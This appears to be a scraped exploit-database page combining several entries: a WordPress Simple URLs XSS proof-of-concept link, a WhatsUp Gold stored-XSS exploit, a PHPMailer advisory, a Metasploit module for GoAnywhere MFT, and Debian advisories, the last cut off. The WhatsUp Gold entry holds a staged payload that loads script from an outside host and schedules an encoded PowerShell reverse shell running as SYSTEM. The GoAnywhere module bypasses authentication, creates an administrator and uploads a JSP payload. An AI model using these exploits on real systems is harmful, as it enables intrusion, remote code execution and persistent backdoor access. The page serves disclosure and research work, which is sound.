WordPress Simple URLs plugin versions prior to 115 suffer from a cross site scripting vulnerability.

    # Exploit Title: simple urls < 115  XSS# Google Dork:# Exploit Author: AmirZargham# Vendor Homepage: https://getlasso.co/# Software Link: https://wordpress.org/plugins/simple-urls/# Version: < 115# Tested on: firefox,chrome# CVE: CVE-2023-0099# CWE: CWE-79# Platform: MULTIPLE# Type: WebAppsDescriptionThe Simple URLs WordPress plugin before 115 does not sanitise and escapesome parameters before outputting them back in some pages, leading toReflected Cross-Site Scripting.Usage Info:send malicious link to victim:https://vulnerable.com/wp-content/plugins/simple-urls/admin/assets/js/import-js.php?search=<script>alert(origin)</script>

WordPress Simple URLs Cross Site Scripting

WhatsUp Gold 2022 version 22.1.0 Build 39 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WhatsUpGold 22.1.0 - Stored Cross-Site Scripting (XSS)# Date: April 18, 2023# Exploit Author: Andreas Finstad (4ndr34z)# Vendor Homepage: https://www.whatsupgold.com# Version: v.22.1.0 Build 39# Tested on: Windows 2022 Server# CVE : CVE-2023-35759# Reference: https://nvd.nist.gov/vuln/detail/CVE-2023-35759WhatsUp Gold 2022 (22.1.0 Build 39) Stored XSS in sysName SNMP parameter.Vulnerability Report: Stored XSS in WhatsUp Gold 2022 (22.1.0 Build 39)Product Name: WhatsUp Gold 2022Version: 22.1.0 Build 39Vulnerability Type: Stored Cross-Site Scripting (XSS)Description:WhatsUp Gold 2022 is vulnerable to a stored cross-site scripting (XSS) attack that allows an attacker to inject malicious scripts into the admin console. The vulnerability exists in the sysName SNMP field on a device, which reflects the input from the SNMP device into the admin console after being discovered by SNMP. An attacker can exploit this vulnerability by crafting a specially crafted SNMP device name that contains malicious code. Once the device name is saved and reflected in the admin console, the injected code will execute in the context of the admin user, potentially allowing the attacker to steal sensitive data or perform unauthorized actions.As there is no CSRF tokens or CDP, it is trivial to create a javascript payload that adds an scheduled action on the server, that executes code as "NT System". In my POC code, I add a Powershell revshell that connects out to the attacker every 5 minutes. (screenshot3)The XSS trigger when clicking the "All names and addresses"Stage:Base64 encoded id property:var a=document.createElement("script");a.src="https://f20.be/t.js";document.body.appendChild(a);Staged payload placed in the SNMP sysName Field on a device:<img id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZjIwLmJlL3QuanMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7Cg== src=https://f20.be/1 onload=eval(atob(this.id))>payload:var vhost = window.location.protocol+'\/\/'+window.location.hostaddaction();async function addaction() {var arguments = ''let run = fetch(vhost+'/NmConsole/api/core/WugPowerShellScriptAction?_dc=1655327281064',{    method: 'POST',    headers: {        'Connection': 'close',        'Content-Length': '1902',        'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"',        'Accept': 'application/json',        'Content-Type': 'application/json',        'X-Requested-With': 'XMLHttpRequest',        'sec-ch-ua-mobile': '?0',        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',        'sec-ch-ua-platform': '"macOS"',        'Sec-Fetch-Mode': 'cors',        'Sec-Fetch-Dest': 'empty',        'Accept-Encoding': 'gzip, deflate',        'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'    },    credentials: 'include',    body: '{"id":-1,"Timeout":30,"ScriptText":"Start-process powershell -argumentlist \\"-W Hidden -noprofile -executionpolicy bypass -NoExit -e JAB0AG0AcAAgAD0AIABAACgAJwBzAFkAUwB0AGUATQAuAG4ARQB0AC4AcwBPAGMAJwAsACcASwBFAHQAcwAuAHQAQwBQAEMAbABJAGUAbgB0ACcAKQA7ACQAdABtAHAAMgAgAD0AIABbAFMAdAByAGkAbgBnAF0AOgA6AEoAbwBpAG4AKAAnACcALAAkAHQAbQBwACkAOwAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAkAHQAbQBwADIAKAAnADEAOQAyAC4AMQA2ADgALgAxADYALgAzADUAJwAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACgAJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQApACAAKwAgACcAQAAnACAAKwAgACgAJABlAG4AdgA6AFUAcwBlAHIARABvAG0AYQBpAG4AKQAgACsAIAAoAFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATgBlAHcATABpAG4AZQApACAAKwAgACgAZwBlAHQALQBsAG8AYwBhAHQAaQBvAG4AKQArACcAPgAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==\\" -NoNewWindow","ScriptImpersonateFlag":false,"ClsId":"5903a09a-cce6-11e0-8f66-fe544824019b","Description":"Evil script","Name":"Systemtask"}'});setTimeout(() => { getactions(); }, 1000);};async function getactions() {const response = await fetch(vhost+'/NmConsole/api/core/WugAction?_dc=4',{    method: 'GET',    headers: {        'Connection': 'close',         'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"',         'Accept': 'application/json',         'Content-Type': 'application/json',         'X-Requested-With': 'XMLHttpRequest',         'sec-ch-ua-mobile': '?0',         'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',         'sec-ch-ua-platform': '"macOS"',         'Sec-Fetch-Site': 'same-origin',         'Sec-Fetch-Mode': 'cors',         'Sec-Fetch-Dest': 'empty',         'Accept-Encoding': 'gzip, deflate',         'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'    },    credentials: 'include'   });const actions = await response.json();var results = [];var searchField = "Name";var searchVal = "Systemtask";for (var i=0 ; i < actions.length ; i++){    if (actions[i][searchField] == searchVal) {        results.push(actions[i].Id);        revshell(results[0])           }}//console.log(actions);};async function revshell(ID) {fetch(vhost+'/NmConsole/Configuration/DlgRecurringActionLibrary/DlgSchedule/DlgSchedule.asp',{    method: 'POST',    headers: {        'Connection': 'close',        'Content-Length': '2442',        'Cache-Control': 'max-age=0',        'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"',        'sec-ch-ua-mobile': '?0',        'sec-ch-ua-platform': '"macOS"',        'Upgrade-Insecure-Requests': '1',        'Origin': 'https://192.168.16.100',        'Content-Type': 'application/x-www-form-urlencoded',        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',        'Sec-Fetch-Site': 'same-origin',        'Sec-Fetch-Mode': 'navigate',        'Sec-Fetch-User': '?1',        'Sec-Fetch-Dest': 'iframe',        'Referer': 'https://192.168.16.100/NmConsole/Configuration/DlgRecurringActionLibrary/DlgSchedule/DlgSchedule.asp',        'Accept-Encoding': 'gzip, deflate',        'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'    },    credentials: 'include',    body: 'DlgSchedule.oCheckBoxEnableSchedule=on&DlgSchedule.ScheduleType=DlgSchedule.oRadioButtonInterval&DlgSchedule.oEditIntervalMinutes=5&ShowAspFormDialog.VISITEDFORM=visited&DlgRecurringActionGeneral.oEditName=test&DlgRecurringActionGeneral.oComboSelectActionType=21&DlgRecurringActionGeneral.DIALOGRETURNURL=%2FNmConsole%2F%24Nm%2FCore%2FForm-AspForms%2Finc%2FShowAspFormDialog.asp&DlgRecurringActionGeneral.SAVEDFORMSTATE=%253cSavedFormState%253e%253cFormVariables%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQueryStringVariables%2F%253e%253c%2FSavedFormState%253e&DlgRecurringActionGeneral.VISITEDFORM=visited%2C+visited&DlgSchedule.DIALOGRETURNURL=%2FNmConsole%2F%24Nm%2FCore%2FForm-AspForms%2Finc%2FShowAspFormDialog.asp&DlgSchedule.SAVEDFORMSTATE=%253cSavedFormState%253e%253cFormVariables%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQueryStringVariables%2F%253e%253c%2FSavedFormState%253e&__EVENTTYPE=ButtonPressed&__EVENTTARGET=DlgSchedule.oButtonFinish&__EVENTARGUMENT=&DlgSchedule.VISITEDFORM=visited&__SOURCEFORM=DlgSchedule&__VIEWSTATE=%253cViewState%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.RecurringAction-sMode%2522%2520sValue%3D%2522new%2522%2F%253e%253coElement%2520sName%3D%2522RecurringAction-nActionTypeID%2522%2520sValue%3D%2522'+ID+'%2522%2F%253e%253coElement%2520sName%3D%2522Date_nStartOfWeek%2522%2520sValue%3D%25220%2522%2F%253e%253coElement%2520sName%3D%2522Date_sMediumDateFormat%2522%2520sValue%3D%2522MMMM%2520dd%2C%2520yyyy%2522%2F%253e%253coElement%2520sName%3D%2522DlgSchedule.sWebUserName%2522%2520sValue%3D%2522admin%2522%2F%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.sWebUserName%2522%2520sValue%3D%2522admin%2522%2F%253e%253coElement%2520sName%3D%2522DlgSchedule.RecurringAction-sMode%2522%2520sValue%3D%2522new%2522%2F%253e%253coElement%2520sName%3D%2522RecurringAction-sName%2522%2520sValue%3D%2522test%2522%2F%253e%253coElement%2520sName%3D%2522Date_bIs24HourTime%2522%2520sValue%3D%25220%2522%2F%253e%253c%2FViewState%253e%0D%0A&DlgSchedule.oEditDay=&DlgSchedule.oComboSelectMonthHour=0&DlgSchedule.oComboSelectMonthMinute=0&DlgSchedule.oComboSelectMonthAmPm=0&DlgSchedule.oComboSelectWeekHour=0&DlgSchedule.oComboSelectWeekMinute=0&DlgSchedule.oComboSelectWeekAmPm=0'});};

WhatsUp Gold 2022 22.1.0 Build 39 Cross Site Scripting

PHPMailer before 1.7.4, when configured to use sendmail, allows remote attackers to execute arbitrary shell commands via shell metacharacters in the SendmailSend function in `class.phpmailer.php`.

### Impact
Shell command injection, remotely exploitable if host application does not filter user data appropriately.

### Patches
Fixed in 1.7.4

### Workarounds
Filter and validate user-supplied data before putting in the into the `Sender` property.

### References
https://nvd.nist.gov/vuln/detail/CVE-2007-3215

### For more information
If you have any questions or comments about this advisory:
* Open a private issue in [the PHPMailer project](https://github.com/PHPMailer/PHPMailer)

**Package**

composer phpmailer/phpmailer (Composer)

**Affected versions**

< 1.7.4

**Patched versions**

1.7.4

**Description**

PHPMailer before 1.7.4, when configured to use sendmail, allows remote attackers to execute arbitrary shell commands via shell metacharacters in the SendmailSend function in class.phpmailer.php.

**Impact**

Shell command injection, remotely exploitable if host application does not filter user data appropriately.

**Patches**

Fixed in 1.7.4

**Workarounds**

Filter and validate user-supplied data before putting in the into the Sender property.

**References**

https://nvd.nist.gov/vuln/detail/CVE-2007-3215

**For more information**

If you have any questions or comments about this advisory:

*   Open a private issue in the PHPMailer project

**References**

*   GHSA-6h78-85v2-mmch
*   https://cxsecurity.com/issue/WLB-2007060063
*   https://exchange.xforce.ibmcloud.com/vulnerabilities/34818
*   https://seclists.org/fulldisclosure/2011/Oct/223
*   https://sourceforge.net/p/phpmailer/bugs/192/
*   https://web.archive.org/web/20070714054359/http://larholm.com/2007/06/11/phpmailer-0day-remote-execution/
*   https://yehg.net/lab/pr0js/advisories/%5BvTiger\_5.2.1%5D\_rce

 Synchro published to PHPMailer/PHPMailer

Mar 5, 2020

Published to the GitHub Advisory Database

Feb 2, 2024

Reviewed

Feb 2, 2024

Last updated

Feb 2, 2024

GHSA-6h78-85v2-mmch: PHPMailer Shell command injection

This Metasploit module exploits a vulnerability in Fortra GoAnywhere MFT that allows an unauthenticated attacker to create a new administrator account. This can be leveraged to upload a JSP payload and achieve RCE. GoAnywhere MFT versions 6.x from 6.0.1, and 7.x before 7.4.1 are vulnerable.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::FileDropper  include Msf::Auxiliary::Report  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Fortra GoAnywhere MFT Unauthenticated Remote Code Execution',        'Description' => %q{          This module exploits a vulnerability in Fortra GoAnywhere MFT that allows an unauthenticated attacker to          create a new administrator account. This can be leveraged to upload a JSP payload and achieve RCE. GoAnywhere          MFT versions 6.x from 6.0.1, and 7.x before 7.4.1 are vulnerable.        },        'License' => MSF_LICENSE,        'Author' => [          'sfewer-r7', # MSF RCE Exploit          'James Horseman', # Original auth bypass PoC/Analysis          'Zach Hanley' # Original auth bypass PoC/Analysis        ],        'References' => [          ['CVE', '2024-0204'],          ['URL', 'https://www.fortra.com/security/advisory/fi-2024-001'], # Vendor Advisory          ['URL', 'https://www.horizon3.ai/cve-2024-0204-fortra-goanywhere-mft-authentication-bypass-deep-dive/']        ],        'DisclosureDate' => '2024-01-22',        'Platform' => %w[linux win],        'Arch' => [ARCH_JAVA],        'Privileged' => true, # Could be 'NT AUTHORITY\SYSTEM' on Windows, or a non-root user 'gamft' on Linux.        'Targets' => [          [            # Tested on GoAnywhere 7.4.0 with the payload java/jsp_shell_reverse_tcp            'Automatic', {}          ],          [            'Linux',            {              'Platform' => 'linux',              'GOANYWHERE_INSTALL_PATH' => '/opt/HelpSystems/GoAnywhere'            }          ],          [            'Windows',            {              'Platform' => 'win',              'GOANYWHERE_INSTALL_PATH' => 'C:\\Program Files\\Fortra\\GoAnywhere\\'            },          ],        ],        'DefaultOptions' => {          'RPORT' => 8001,          'SSL' => true        },        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [            IOC_IN_LOGS,            # A new admin account is created, which the exploit can't destroy.            CONFIG_CHANGES,            # The upload may leave payload artifacts if the FileDropper mixins cleanup handlers cannot delete them.            ARTIFACTS_ON_DISK          ]        }      )    )    register_options(      [        OptString.new('TARGETURI', [true, 'The base path to the web application', '/goanywhere/']),      ]    )  end  def check    # We can query an undocumented unauthenticated REST API endpoint and pull the version number.    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, '/rest/gacmd/v1/system')    )    return CheckCode::Unknown('Connection failed') unless res    return CheckCode::Unknown("Received unexpected HTTP status code: #{res.code}.") unless res.code == 200    json_data = res.get_json_document    product = json_data.dig('data', 'product')    version = json_data.dig('data', 'version')    return CheckCode::Unknown('No version information in response') if product.nil? || version.nil?    # As per the Fortra advisory, the following version are affected:    # * Fortra GoAnywhere MFT 6.x from 6.0.1    # * Fortra GoAnywhere MFT 7.x before 7.4.1    # This seems to imply version 6.0.1 through to 7.4.0 (inclusive) are vulnerable.    if Rex::Version.new(version).between?(Rex::Version.new('6.0.1'), Rex::Version.new('7.4.0'))      return CheckCode::Appears("#{product} #{version}")    end    Exploit::CheckCode::Safe("#{product} #{version}")  end  def exploit    # CVE-2024-0204 allows an unauthenticated attacker to create a new administrator account on the target system. So    # we generate the username/password pair we want to use.    # Note: We cannot delete the administrator account that we create.    admin_username = Rex::Text.rand_text_alpha_lower(8)    admin_password = Rex::Text.rand_text_alphanumeric(16)    # By using a double dot path segment with a semicolon in it, we can bypass the servers attempts to block access to    # the /wizard/InitialAccountSetup.xhtml endpoint that allows new admin account creation. As we leverage a double    # dot path segment, we need a directory to navigate down from, there are many available on the target so we pick    # a random one that we know works.    path_segments = %w[styles fonts auth help]    path_segment = path_segments.sample    # This is CVE-2024-0204...    initialaccountsetup_endpoint = "/#{path_segment}/..;/wizard/InitialAccountSetup.xhtml"    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, initialaccountsetup_endpoint),      'keep_cookies' => true,      'vars_post' => {        'javax.faces.ViewState' => get_viewstate(initialaccountsetup_endpoint),        'j_id_u:creteAdminGrid:username' => admin_username,        'j_id_u:creteAdminGrid:password' => admin_password,        'j_id_u:creteAdminGrid:password_hinput' => admin_password,        'j_id_u:creteAdminGrid:confirmPassword' => admin_password,        'j_id_u:creteAdminGrid:confirmPassword_hinput' => admin_password,        'j_id_u:creteAdminGrid:submitButton' => '',        'createAdminForm_SUBMIT' => 1      }    )    # The method com.linoma.ga.ui.admin.users.InitialAccountSetupForm.InitialAccountSetupForm.submit will call method    # loginNewAdminUser and update our current session, so we dont need to manually login.    unless res&.code == 302 && res.headers['Location'] == normalize_uri(target_uri.path, 'Dashboard.xhtml')      fail_with(Failure::UnexpectedReply, "Unexpected reply 1 from #{initialaccountsetup_endpoint}")    end    print_status("Created account: #{admin_username}:#{admin_password}. Note: This account will not be deleted by the module.")    store_credentials(admin_username, admin_password)    # Automatic targeting will detect the OS and product installation directory, by querying the About.xhtml page.    if target.name == 'Automatic'      res = send_request_cgi(        'method' => 'GET',        'uri' => normalize_uri(target_uri.path, '/help/About.xhtml'),        'keep_cookies' => true      )      unless res&.code == 200        fail_with(Failure::UnexpectedReply, 'Unexpected reply 2 from About.xhtml')      end      # The OS name could be something like "Linux" or "Windows Server 2022". Under the hood, GoAnywhere is using      # the Java system property "os.name".      os_match = res.body.match(%r{<span id="AboutForm:\S+:OSName">(.+)</span>})      unless os_match        fail_with(Failure::UnexpectedReply, 'Did not locate OSName in About.xhtml')      end      # To perform the JSP payload upload, we need to know the product installation path.      install_match = res.body.match(%r{<span id="AboutForm:\S+:goAnywhereHome">(.+)</span>})      unless install_match        fail_with(Failure::UnexpectedReply, 'Did not locate goAnywhereHome in About.xhtml')      end      # Find the Metasploit target (Linux/Windows) via a substring of the OS name we get back from GoAnywhere.      found_target = targets.find do |t|        os_match[1].downcase.include? t.name.downcase      end      unless found_target        fail_with(Failure::NoTarget, "Unable to select an automatic target for '#{os_match[1]}'")      end      # Dup the target we found, as we patch in the GOANYWHERE_INSTALL_PATH below.      detected_target = found_target.dup      detected_target.opts['GOANYWHERE_INSTALL_PATH'] = install_match[1]      print_status("Automatic targeting, detected OS: #{detected_target.name}")      print_status("Automatic targeting, detected install path: #{detected_target['GOANYWHERE_INSTALL_PATH']}")    else      detected_target = target    end    # We are going to upload a JSP payload via the FileManager interface. We first have to get the FileManager, then    # change to the directory we want to upload to, then upload the file.    path_separator = detected_target['Platform'] == 'win' ? '\\' : '/'    # We drop the JSP payload to a location such as: /opt/HelpSystems/GoAnywhere/adminroot/PAYLOAD_NAME.jsp    adminroot_path = detected_target['GOANYWHERE_INSTALL_PATH']    adminroot_path += path_separator unless adminroot_path.end_with? path_separator    adminroot_path += 'adminroot'    adminroot_path += path_separator    viewstate = get_viewstate('/tools/filemanager/FileManager.xhtml')    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/tools/filemanager/FileManager.xhtml'),      'keep_cookies' => true,      'vars_post' => {        'javax.faces.ViewState' => viewstate,        'j_id_4u:j_id_4v:newPath_focus' => '',        'j_id_4u:j_id_4v:newPath_input' => '/',        'j_id_4u:j_id_4v:newPath_editableInput' => adminroot_path,        'j_id_4u:j_id_4v:NewPathButton' => '',        'j_id_4u_SUBMIT' => 1      }    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply 4 from FileManager.xhtml')    end    # We require a regID value form the page to upload a file, so we pull that out here.    vs_input = res.get_html_document.at('input[name="reqId"]')    unless vs_input&.key? 'value'      fail_with(Failure::UnexpectedReply, 'Did not locate reqId in reply 4 from FileManager.xhtml')    end    request_id = vs_input['value']    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/tools/filemanager/FileManager.xhtml'),      'keep_cookies' => true,      'vars_post' => {        'javax.faces.ViewState' => viewstate,        'javax.faces.partial.ajax' => 'true',        'javax.faces.source' => 'uploadID',        'javax.faces.partial.execute' => 'uploadID',        'javax.faces.partial.render' => '@none',        'uploadID' => 'uploadID',        'uploadID_sessionCheck' => 'true',        'reqId' => request_id,        'whenFileExists_focus' => '',        'whenFileExists_input' => 'rename',        'uploaderType' => 'filemanager',        'j_id_4i_SUBMIT' =>  1      }    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply 5 from FileManager.xhtml')    end    jsp_filename = Rex::Text.rand_text_alphanumeric(8) + '.jsp'    message = Rex::MIME::Message.new    message.add_part(request_id, nil, nil, 'form-data; name="reqId"')    message.add_part('', nil, nil, 'form-data; name="whenFileExists_focus"')    message.add_part('rename', nil, nil, 'form-data; name="whenFileExists_input"')    message.add_part('filemanager', nil, nil, 'form-data; name="uploaderType"')    message.add_part('1', nil, nil, 'form-data; name="j_id_4i_SUBMIT"')    message.add_part(viewstate, nil, nil, 'form-data; name="javax.faces.ViewState"')    message.add_part('true', nil, nil, 'form-data; name="javax.faces.partial.ajax"')    message.add_part('uploadID', nil, nil, 'form-data; name="javax.faces.partial.execute"')    message.add_part('uploadID', nil, nil, 'form-data; name="javax.faces.source"')    message.add_part('1', nil, nil, 'form-data; name="uniqueFileUploadId"')    message.add_part(payload.encoded, 'text/plain', nil, "form-data; name=\"uploadID\"; filename=\"#{jsp_filename}\"")    # We can now upload our payload...    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/tools/filemanager/FileManager.xhtml'),      'keep_cookies' => true,      'ctype' => 'multipart/form-data; boundary=' + message.bound,      'data' => message.to_s    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply 6 from FileManager.xhtml')    end    # Register our payload so it is deleted when the session is created.    jsp_filepath = adminroot_path + jsp_filename    print_status("Dropped payload: #{jsp_filepath}")    # We are using the FileDropper mixin to automatically delete this file after a session has been created.    register_file_for_cleanup(jsp_filepath)    # A copy of the files this user uploads is left here:    # /opt/HelpSystems/GoAnywhere/userdata/documents/ADMIN_USERNAME/PAYLOAD_NAME.jsp    # We register these to be deleted, but they appear to be locked, preventing deleting.    userdoc_path = detected_target['GOANYWHERE_INSTALL_PATH']    userdoc_path += path_separator unless userdoc_path.end_with? path_separator    userdoc_path += 'userdata'    userdoc_path += path_separator    userdoc_path += 'documents'    userdoc_path += path_separator    userdoc_path += admin_username    userdoc_path += path_separator    register_file_for_cleanup(userdoc_path + jsp_filename)    register_dir_for_cleanup(userdoc_path)    # Finally, trigger our payload via a GET request...    send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, jsp_filename)    )    # NOTE: it is not possible to delete the user account we created as we cant delete ourself either via the web    # interface or REST API.  end  # Helper method to pull out a viewstate identifier from a requests HTML response.  def get_viewstate(endpoint)    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, endpoint),      'keep_cookies' => true    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, "Unexpected reply during get_viewstate via '#{endpoint}'.")    end    vs_input = res.get_html_document.at('input[name="javax.faces.ViewState"]')    unless vs_input&.key? 'value'      fail_with(Failure::UnexpectedReply, "Did not locate ViewState during get_viewstate via '#{endpoint}'.")    end    vs_input['value']  end  def store_credentials(username, password)    service_data = {      address: datastore['RHOST'],      port: datastore['RPORT'],      service_name: 'GoAnywhere MFT Admin Interface',      protocol: 'tcp',      workspace_id: myworkspace_id    }    credential_data = {      origin_type: :service,      module_fullname: fullname,      username: username,      private_data: password,      private_type: :password    }.merge(service_data)    credential_core = create_credential(credential_data)    login_data = {      core: credential_core,      last_attempted_at: DateTime.now,      status: Metasploit::Model::Login::Status::SUCCESSFUL    }.merge(service_data)    create_credential_login(login_data)  endend

Fortra GoAnywhere MFT Unauthenticated Remote Code Execution

Debian Linux Security Advisory 5613-1 - Several vulnerabilities have been discovered in the OpenJDK Java runtime, which may result in side channel attacks, leaking sensitive data to log files, denial of service or bypass of sandbox restrictions.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5613-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffFebruary 01, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : openjdk-17CVE ID         : CVE-2024-20918 CVE-2024-20919 CVE-2024-20921 CVE-2024-20926                  CVE-2024-20932 CVE-2024-20945 CVE-2024-20952Several vulnerabilities have been discovered in the OpenJDK Java runtime,which may result in side channel attacks, leaking sensitive data to logfiles, denial of service or bypass of sandbox restrictions.For the oldstable distribution (bullseye), these problems have been fixedin version 17.0.10+7-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 17.0.10+7-1~deb12u1.We recommend that you upgrade your openjdk-17 packages.For the detailed security status of openjdk-17 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/openjdk-17Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmW8HJwACgkQEMKTtsN8Tjbt9A//Xgt7dwtzkBgkxjJ9Tq6pqQGqYzQQjID6xmyta+/oZ9FJzPojV+1I7z7YeOOYrXHmCU9EM30Gbwtt4aEBbz1lvAk1mYC5Ob5TE+oYS/r76REJS89IqkNpmlpWFMzQICgPDHPE1Vm3HyitF6Xy9CLOFZBeH0wELhzuHAIOd4rb+XqQsW8JW4V12ZoLAVHoP5U2PGBPWVbyEY06LTgyEe06L+XX1zSiPnRnhdeTs7YD69SxMUP9AF7QvfIzOvzLw0u0M4g7KNzZ+43OJOdlbq76KzfcqfkoxWA3902vYewfyncx5HVCNpCQdrESIt9Xjqojmda7dh0V9EIGP3HHFufjWnJTOegPqeJ2RV03LkpOygg1W+XEHn32fcA1EtqDYUW67jsu81dYZs2wc2YqALJfjYjeUKBdcRD91MUqn7uBpCfPd9Yo1rrO2dqyeBgQeI7itzdM+bEtCkuVcnyCWr4rXK4kt2xpIdkcwUZxCosQ7FX/TchvyPvDk2LQSMg2azCSAhcrv7aB/jzxlvSF/iRzQipdLmRgc4H+8TY0lG43m7xzHlyu3TXerDNIBQGktkWo6182rScrO+t0brfcCpTxUQwGyBrHh7SQURdvffZPCJ36/7YmjGSWZi4qafr6OfTCGDlt/BcE5fhROsA7OKNgwumUz9hqSK3mCFBDmhDQDTw==Suvn-----END PGP SIGNATURE-----

Debian Security Advisory 5613-1

Debian Linux Security Advisory 5612-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5612-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonFebruary 01, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-1059 CVE-2024-1060 CVE-2024-1077Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 121.0.6167.139-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: 